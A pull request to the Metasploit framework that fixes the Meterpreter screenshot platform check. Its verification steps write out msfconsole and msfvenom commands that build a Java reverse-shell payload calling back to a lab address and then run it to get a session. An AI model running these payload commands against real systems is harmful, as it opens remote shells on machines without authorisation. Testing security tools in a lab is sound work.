### PR TITLE
fix #14749, fix screenshot platform check

### DIFF
--- a/lib/rex/post/meterpreter/extensions/stdapi/ui.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/ui.rb
@@ -155,7 +155,7 @@ class UI < Rex::Post::UI
     request = Packet.create_request( COMMAND_ID_STDAPI_UI_DESKTOP_SCREENSHOT )
     request.add_tlv( TLV_TYPE_DESKTOP_SCREENSHOT_QUALITY, quality )
 
-    if client.platform == 'windows'
+    if client.base_platform == 'windows'
       # Check if the target is running Windows 8/Windows Server 2012 or later and there are session 0 desktops visible.
       # Session 0 desktops should only be visible to services. Windows 8/Server 2012 and later introduce the restricted
       # desktop for services, which means that services cannot view the normal user's desktop or otherwise interact with


### PR DESCRIPTION
Quick fix for #14749 
This also prevents uploading the screenshot dll on non-native Windows meterpreter sessions. 

## Verification

List the steps needed to make sure this thing works

- [ ] Start a java meterpreter handler: `msfconsole -qx "use exploit/multi/handler; set payload java/meterpreter/reverse_tcp; set lhost 192.168.56.1; set lport 4444; set ExitOnSession false; run -j"`
- [ ] Create a java payload: `msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -o met.jar`
- [ ] Get a session on windows: `java -jar met.jar`
- [ ] Take a screenshot using the java meterpreter session `meterpreter > screenshot`
- [ ] **Verify** a screenshot is taken
